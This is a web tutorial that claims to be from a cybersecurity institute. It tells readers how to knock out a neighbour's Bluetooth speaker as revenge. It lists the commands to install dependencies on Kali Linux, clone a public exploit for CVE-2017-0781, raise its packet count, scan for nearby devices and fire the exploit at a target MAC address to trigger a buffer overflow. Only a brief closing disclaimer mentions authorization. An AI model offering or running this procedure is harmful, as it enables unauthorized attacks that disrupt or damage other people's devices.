Tutorials

Revenge your neighbor’s party by jamming any Bluetooth speaker. Creating a Bluetooth jammer with just 9 commands without any special hardware

We’ve all dealt with annoying neighbors who keep listening to music at a high volume, even in the early morning and thanks to their Bluetooth speakers, whist have became a must in most modern homes.

When kindness is not enough for neighbors to stop making noise, you can resort to a more assertive method. This time, network security specialists from the International Institute of Cyber Security (IICS) will show you how to spoil the operation of a Bluetooth speaker and other devices that depend on the use of this connection protocol.


Starting with the process

According to network security experts, you must install Kali Linux in your device before starting the attack: (https://www.kali.org/downloads/).


  • For the exploit to work properly, you must install the following dependencies:
apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
  • Next we will update pwntools:
pip install --upgrade pip
pip install --upgrade pwntools
  • Subsequently, network security experts mention that the libraries needed to work with Bluetooth will need to be installed
apt-get install bluetooth libbluetooth-dev
pip install pybluez
  • Download the exploit using the following command:
git clone https://github.com/ojasookert/CVE-2017-0781
  • In the downloaded Python file, network security experts recommend correcting the number of packets by changing the count variable to a minimum of 30k

Using the tool

  • Now we scan the Bluetooth connection with the following command:

hcitool scan

  • Select the device, copy its MAC address and type the command:
python CVE-2017-0781.py TARGET = <MAC address>

Running this command will send multiple requests to the affected device, resulting in a buffer overflow and preventing the Bluetooth speaker from working properly, thus solving its problems by outrageous neighbors.

IICS experts recommend using this technique only in controlled environments and, if possible, with the express authorization of the rest of the people involved. This tutorial is for educational and research purposes only. Don’t misuse this information.


To Top

Pin It on Pinterest

Share This